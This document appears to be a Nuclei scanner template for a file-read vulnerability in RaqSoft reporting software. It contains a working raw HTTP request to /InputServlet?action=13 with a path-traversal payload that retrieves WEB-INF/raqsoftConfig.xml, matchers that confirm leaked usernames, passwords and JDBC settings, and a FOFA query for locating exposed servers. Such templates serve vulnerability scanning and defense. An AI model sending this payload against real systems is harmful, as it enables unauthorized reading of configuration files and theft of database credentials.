id: raqsoft-InputServlet-fileread

info:
  name: 润乾报表 InputServlet - fileread
  author: leadlife
  severity: high
  description: 
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: body="/raqsoft"
  tags: raqsoft, fileread

http:
  - raw:
      - |
        POST /InputServlet?action=13 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        
        file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,"xml","user","password",'jdbc','property')
        condition: and
